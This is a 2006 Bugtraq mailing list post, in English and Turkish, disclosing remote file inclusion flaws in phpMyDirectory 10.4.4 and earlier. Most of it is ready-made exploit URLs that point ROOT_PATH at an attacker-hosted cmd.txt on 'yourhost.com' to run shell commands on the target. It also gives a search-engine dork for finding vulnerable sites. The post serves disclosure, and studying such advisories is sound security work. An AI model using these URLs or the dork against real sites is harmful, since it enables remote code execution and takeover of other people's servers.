Bugtraq mailing list archives
phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)
From: ajannhwt () hotmail com
Date: 22 May 2006 18:35:05 -0000
ENGLISH # Title : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities # Dork : "powered by phpmydirectory" # Author : ajann # greetz : Nukedx,TheHacker # Exploit; ### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls # ajann,Turkey TURKISH # Başlık : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities # Sözcük[Arama] : "powered by phpmydirectory" # Açığı Bulan : ajann # greetz : Nukedx,TheHacker # Açık bulunan dosyalar; ### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls ### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls Açıklama: Temalarda bulunan footer.php dosyası güvenlik açığına yol açmaktadır.Bu sayede uzaktan kod çalıştırılabilir. defaults_setup.php kurulumdan sonra silinmemişse aynı açık uygulanabilmektedir. test/header.php bölümü ise bazen denk gelmektedir,aynı açık bulunmaktadır. Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır. Thanks.
Current thread:
- phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!) ajannhwt (May 23)